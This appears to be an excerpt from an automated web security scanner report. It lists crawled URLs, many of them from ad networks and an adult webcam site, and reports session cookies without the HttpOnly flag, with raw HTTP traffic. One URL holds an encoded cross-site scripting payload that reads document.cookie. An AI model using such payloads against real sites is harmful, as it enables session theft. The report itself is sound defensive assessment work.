http://base.liveperson.net/hc/5296924/cmd/url/
https://base.liveperson.net/hc/5296924/
https://base.liveperson.net/hc/5296924/
https://base.liveperson.net/hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/
http://br.imlive.com/
http://br.imlive.com/waccess/
http://bs.serving-sys.com/BurstingPipe/BannerSource.asp
http://bs.serving-sys.com/BurstingPipe/BannerSource.asp
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://c.chango.com/collector/tag.js
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js
http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js
http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js
http://cafr.imlive.com/
http://cafr.imlive.com/waccess/
http://cbs6albany.oodle.com/
http://cbs6albany.oodle.com/pro/fb-follow/
http://d7.zedo.com/OzoDB/cutils/R52_9/jsc/1302/egc.js
http://d7.zedo.com/OzoDB/cutils/R52_9/jsc/951/egc.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js
http://d7.zedo.com/bar/v16-401/d3/jsc/gl.js
http://d7.zedo.com/img/bh.gif
http://d7.zedo.com/utils/ecSet.js
http://de.imlive.com/
http://de.imlive.com/waccess/
http://digg.com/submit
http://dk.imlive.com/
http://dk.imlive.com/waccess/
http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11370845975@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11624211567@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11911576582@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23
http://dm.de.mookie1.com/2/B3DM/DLX/@x94
http://es.imlive.com/
http://es.imlive.com/waccess/
http://events.cbs6albany.com/
http://fr.imlive.com/
http://fr.imlive.com/waccess/
http://gr.imlive.com/
http://gr.imlive.com/waccess/
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html
http://hosted.ap.org/lineups/NEWSBRIEF-bulleted.js
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/vj
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/vj
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/vj
http://imlive.com/
http://imlive.com/GuestDiscountClubs.aspx
http://imlive.com/awardarena/
http://imlive.com/becomehost.aspx
http://imlive.com/categoryfs.asp
http://imlive.com/categoryms.asp
http://imlive.com/disclaimer.asp
http://imlive.com/live-sex-chats/
http://imlive.com/live-sex-chats/adult-shows/
http://imlive.com/live-sex-chats/cam-girls/
http://imlive.com/live-sex-chats/cam-girls/categories/
http://imlive.com/live-sex-chats/cam-girls/hotspots/
http://imlive.com/live-sex-chats/cams-aroundthehouse/
http://imlive.com/live-sex-chats/caught-on-cam/
http://imlive.com/live-sex-chats/couple/
http://imlive.com/live-sex-chats/fetish/
http://imlive.com/live-sex-chats/fetish/categories/
http://imlive.com/live-sex-chats/free-sex-video-for-ipod/
http://imlive.com/live-sex-chats/free-sex-video/
http://imlive.com/live-sex-chats/gay-couple/
http://imlive.com/live-sex-chats/gay/
http://imlive.com/live-sex-chats/guy-alone/
http://imlive.com/live-sex-chats/happyhour/
http://imlive.com/live-sex-chats/lesbian-couple/
http://imlive.com/live-sex-chats/lesbian/
http://imlive.com/live-sex-chats/live-sex-video/
http://imlive.com/live-sex-chats/nude-chat/
http://imlive.com/live-sex-chats/orgies/
http://imlive.com/live-sex-chats/pornstars/
http://imlive.com/live-sex-chats/role-play/
http://imlive.com/live-sex-chats/sex-show-galleries/
http://imlive.com/live-sex-chats/sex-show-photos/
http://imlive.com/live-sex-chats/sex-show-sessions/
http://imlive.com/live-sex-chats/sex-video-features/
http://imlive.com/live-sex-chats/shemale-couple/
http://imlive.com/live-sex-chats/shemale/
http://imlive.com/live-sex-chats/shy-girl/
http://imlive.com/liveexperts.asp
http://imlive.com/localcompanionship.asp
http://imlive.com/minglesingles.asp
http://imlive.com/pr.asp
http://imlive.com/preparesearch.aspx
http://imlive.com/sex_webcams_index/index.asp
http://imlive.com/sitemap.html
http://imlive.com/videosfr.asp
http://imlive.com/warningms.asp
http://imlive.com/webcam-advanced-search/
http://imlive.com/webcam-faq/
http://imlive.com/webcam-login/
http://imlive.com/webcam-sign-up/
http://imlive.com/wmaster.ashx
http://in.imlive.com/
http://in.imlive.com/waccess/
http://it.imlive.com/
http://it.imlive.com/waccess/
http://jp.imlive.com/
http://jp.imlive.com/waccess/
http://local.nissanusa.com/albany-schenectady-troy-ny-area
http://local.nissanusa.com/albuquerque-santa-fe-area
http://local.nissanusa.com/atlanta-area
http://local.nissanusa.com/austin-area
http://local.nissanusa.com/baltimore-area
http://local.nissanusa.com/boston-area
http://local.nissanusa.com/chicago-area
http://local.nissanusa.com/cincinnati-area
http://local.nissanusa.com/cleveland-area
http://local.nissanusa.com/columbus-oh-area
http://local.nissanusa.com/dallas-ft-worth-area
http://local.nissanusa.com/denver-area
http://local.nissanusa.com/harlingen-brownsville-tx-area
http://local.nissanusa.com/harrisburg-lancaster-pa-area
http://local.nissanusa.com/hartford-new-haven-ct-area
http://local.nissanusa.com/honolulu-area
http://local.nissanusa.com/houston-area
http://local.nissanusa.com/index.html
http://local.nissanusa.com/indianapolis-area
http://local.nissanusa.com/jacksonville-area
http://local.nissanusa.com/las-vegas-area
http://local.nissanusa.com/little-rock-pine-bluff-ar-area
http://local.nissanusa.com/los-angeles-area
http://local.nissanusa.com/louisville-area
http://local.nissanusa.com/miami-area
http://local.nissanusa.com/milwaukee-area
http://local.nissanusa.com/minneapolis-area
http://local.nissanusa.com/nashville-area
http://local.nissanusa.com/new-orleans-area
http://local.nissanusa.com/new-york-area
http://local.nissanusa.com/norfolk-portsmouth-newport-news-area
http://local.nissanusa.com/oklahoma-city-area
http://local.nissanusa.com/orlando-area
http://local.nissanusa.com/philadelphia-area
http://local.nissanusa.com/phoenix-area
http://local.nissanusa.com/pittsburgh-area
http://local.nissanusa.com/portland-or-area
http://local.nissanusa.com/providence-new-bedford-area
http://local.nissanusa.com/sacramento-area
http://local.nissanusa.com/salt-lake-city-area
http://local.nissanusa.com/san-antonio-area
http://local.nissanusa.com/san-diego-area
http://local.nissanusa.com/san-francisco-oakland-san-jose-area
http://local.nissanusa.com/seattle-tacoma-area
http://local.nissanusa.com/st-louis-area
http://local.nissanusa.com/tampa-st-petersburg-area
http://local.nissanusa.com/washington-dc-area
http://local.nissanusa.com/wilkes-barre-scranton-pa-area
http://local.nissanusa.com/zip.aspx
http://media.fastclick.net/w/click.here
http://media.fastclick.net/w/get.media
http://mig.nexac.com/2/B3DM/DLX/1@x96
http://mx.imlive.com/
http://mx.imlive.com/waccess/
http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it
http://network.realmedia.com/3/bostonherald/ros/728x90/jx/ss/a/L31@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1/
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1210886297@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1969188118@Top1
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3
http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1020254070/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670
http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1141449012/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670
http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1183243859/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670
http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1310742069/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670
http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/141555552/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670
http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1616156922/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670
http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1911154246/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670
http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/2083207614/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670
http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670
http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/53616777/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670
http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/537212856/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670
http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/702021509/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670
http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670
http://nl.imlive.com/
http://nl.imlive.com/waccess/
http://no.imlive.com/
http://no.imlive.com/waccess/
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1204429614@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1244397821@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1494452952@Top,Middle,Right,Right1,x01,x02,x03,x04
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247919265/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/126580716/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/133886311/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1410609386/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1462172569/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/167914676/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790696998/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2021312465/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2141444174/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/589036194/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/672313137/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/677208420/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Middle
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Right
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Top
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Bottom
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle1
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle2
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x15
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x16
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/mediacenter@Top,Right,Middle,Bottom!Middle
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Bottom
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Middle
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Right
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Top
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Bottom
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle1
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Right
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Top
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top
http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@x05!x05
http://oascentral.bostonherald.com/RealMedia/ads/adstream_mjx.ads/bh.heraldinteractive.com/home/1392253820@Position1,Position2
http://pu.imlive.com/
http://pu.imlive.com/waccess/
http://ru.imlive.com/
http://ru.imlive.com/waccess/
http://se.imlive.com/
http://se.imlive.com/waccess/
http://smm.sitescout.com/click
http://syndication.mmismm.com/mmtnt.php
http://tag.contextweb.com/TAGPUBLISH/getad.aspx
http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
http://tap.rubiconproject.com/oz/sensor
http://tap.rubiconproject.com/partner/agent/rubicon/channels.js
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt&clickTag2=http:/r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000935955/cstr=44199605=_4d436292,1445734807,766161^935955^1183^0,1_/xsxdata=$xsxdata/bnum=44199605/optn=64
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl
http://tr.imlive.com/
http://tr.imlive.com/waccess/
http://voken.eyereturn.com/
http://voken.eyereturn.com/
http://voken.eyereturn.com/pb/get
http://voken.eyereturn.com/pix
http://www.addthis.com/bookmark.php
http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video
http://www.moxiesoft.com/tal_products/chat.aspx
http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1
http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm
http://www.parkersoft.co.uk/client.aspx
http://www.parkersoft.co.uk/supnotes.aspx
http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan
http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/
http://www.zvents.com/zat
http://xads.zedo.com/ads2/c

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

11.1. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ad.doubleclick.net.57389.9231.302br.net
Path:	/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=1B2A83185956BA19ABB6FE6E70A6C415; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1B2A83185956BA19ABB6FE6E70A6C415; Path=/
Content-Type: text/html
Content-Length: 7169
Date: Fri, 28 Jan 2011 22:47:58 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
mode : "jsi",
jsref : "http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Midd
...[SNIP]...

11.2. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ad.doubleclick.net.57390.9231.302br.net
Path:	/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=23121407506AF928BA0892656699F17B; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=23121407506AF928BA0892656699F17B; Path=/
Content-Type: text/javascript
Content-Length: 6792
Date: Sat, 29 Jan 2011 05:20:26 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "null",
   adsafeSrc : "http://ad.doubleclick.net.57390.9231.302br.net/fw/adj/N4682.132309.BURSTMEDIA/B4421704.7",
   adsafeSep : "?",
   requrl : "",
   reqq
...[SNIP]...

